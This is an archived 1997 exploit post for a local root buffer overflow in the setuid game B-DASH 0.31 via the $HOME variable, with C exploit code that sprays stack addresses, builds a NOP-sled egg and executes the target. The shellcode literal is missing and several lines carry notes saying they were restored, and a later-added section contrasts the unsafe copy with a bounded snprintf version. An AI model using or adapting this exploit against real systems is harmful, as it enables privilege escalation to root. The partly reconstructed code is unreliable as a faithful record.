B-DASH 0.31 $HOME overflow

Description: Standard pathetic suid-for-svgalib-totally-insecure application overflow.
Author: Nicolas Dubee <dube0866@EUROBRETAGNE.FR>
Compromise: root (local)
Vulnerable Systems: Mostly old versions of Linux. Possibly current Slackware. Anything with B-DASH v0.31
Date: 21 June 1997 is when he posted this OLD exploit; ignore the date in the mail header, it is bogus.

Date: Sat, 1 Jan 1994 03:00:59 +0100
From: Nicolas Dubee <dube0866@EUROBRETAGNE.FR>

hello all,

I've decided to spread my old exploits, so for a beginning
here is a really old one (sorry if it's known stuff): you have
guessed, this is a buffer overflow, this time it's with
an old svgalib (-> suid root) game: B-DASH 0.31.
It can still be found on some distributions of Linux
(Slackware ?, not Redhat).
The overflow comes with the $HOME environment variable, in
the vconfig() function (vconfig.c).

I included the exploit code below, it should be harmless since
b-dash is quite old.

   plaguez / libpcap

// bdexp.c
/*
 *   B-DASH 0.31 buffer overflow
 *    by   plaguez
 *         dube0866@eurobretagne.fr
 *         http://www.innu.org
 *  compile:   cc bdexp.c -o bdexp
 *  exec:      ./bdexp 8
 *         or  ./bdexp 4
 *         or  ./bdexp 24 ...
 *  you may want to brute-force the offset (argv[1])
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen: include missing from the page as extracted */
#include <unistd.h>

#define EGGSIZE 2048

/* the shellcode string literal is not reproduced on this page;
   the declaration is left exactly as it appears */
char *shellcode =

/* current stack pointer; i386 only, the value is returned in %eax */
unsigned long get_sp() {
   asm("movl %esp,%eax");
}

char *buffer;   /* filler of repeated guessed addresses, exported as $HOME */
char *egg;      /* NOP sled followed by the shellcode */

int main(int argc,char **argv) {
   int i;
   int bsize=1124,offset;
   long *adpt;
   char *pt;

   /* argument check restored: the page as extracted shows only the usage line */
   if (argc != 2) {
        printf("\nusage  %s <offset>",argv[0]);
        exit(0);
   }
   offset=atoi(argv[1]);          /* restored: offset is otherwise never assigned */

   egg=(char *)malloc(EGGSIZE);
   buffer=(char *)malloc(bsize);

   /* fill the whole buffer with the guessed address, one word at a time */
   pt=buffer;                     /* restored: pt is otherwise uninitialised */
   adpt=(long *) pt;
   for (i = 0; i <= bsize-4; i += 4)
    *(adpt++) = get_sp() - offset;

   memset(egg, 0x90,EGGSIZE);
   memcpy(&egg[EGGSIZE-strlen(shellcode)-2], shellcode, strlen(shellcode));

   egg[EGGSIZE-1] = 0;

   setenv("HOME", buffer, 1);

   printf("\nb-dashing ...\n");
   execl("/usr/games/bdash", "/usr/games/bdash", NULL);
   return 0;
}
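The bug class behind this post, as an added example that is not B-DASH's own code and not part of the mail: a setuid-root program copying $HOME into a fixed-size buffer with no length check, beside a bounded version that rejects a HOME that does not fit. The real vconfig() source is not on this page, so the unsafe function is an assumed reconstruction of the shape only; the 256-byte size and the ".bdashrc" file name are made up for the illustration.

```c
/* Added example (not from B-DASH or the post): the bug class described above,
 * an unbounded copy of $HOME into a fixed-size buffer in a setuid-root program,
 * beside a bounded version. The unsafe function is an assumed reconstruction
 * of the shape only; vconfig.c itself is not on the page. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATHLEN 256   /* assumed buffer size for the illustration */

/* Unsafe shape (assumed): the environment decides how many bytes are written.
 * A HOME of PATHLEN bytes or more runs past `out`; it is only called with a
 * short, constructed value here so the example itself stays well-defined. */
static void rc_path_unsafe(const char *home, char out[PATHLEN]) {
    strcpy(out, home);
    strcat(out, "/.bdashrc");
}

/* Bounded version: snprintf writes at most outlen bytes and returns the length
 * the full string would have needed, so truncation is detected and the result
 * rejected rather than silently used. Returns 0 on success, -1 if the input
 * is missing or does not fit (out is then an empty string). */
static int rc_path_safe(const char *home, char *out, size_t outlen) {
    int n;
    if (home == NULL || out == NULL || outlen == 0)
        return -1;
    n = snprintf(out, outlen, "%s/.bdashrc", home);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructs a HOME value of the given length made of 'A's, the kind of filler
 * an overflowing value consists of; the caller frees it. */
static char *make_home(size_t len) {
    char *h = malloc(len + 1);
    if (h != NULL) {
        memset(h, 'A', len);
        h[len] = '\0';
    }
    return h;
}

int main(void) {
    char out[PATHLEN];
    /* 246 bytes is the last length that fits with "/.bdashrc"; 1124 is the post's bsize */
    size_t lengths[] = { 10, PATHLEN - 10, PATHLEN - 9, 1124 };
    size_t k;

    rc_path_unsafe("/home/user", out);     /* fine for short input, but no check at all */
    printf("unsafe: %s\n", out);

    for (k = 0; k < sizeof lengths / sizeof lengths[0]; k++) {
        char *home = make_home(lengths[k]);
        if (home == NULL)
            return 1;
        printf("HOME of %4zu bytes: %s\n", lengths[k],
               rc_path_safe(home, out, sizeof out) == 0 ? "accepted" : "rejected");
        free(home);
    }
    return 0;
}
```

Compile with cc and run: the bounded version fails closed on a 1124-byte HOME (the exploit's filler length) and exactly at the boundary where the path would no longer fit, instead of writing past the buffer. A setuid program is better off not trusting HOME at all and taking the home directory from getpwuid(getuid()) instead.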

This page is part of Fyodor's exploit world.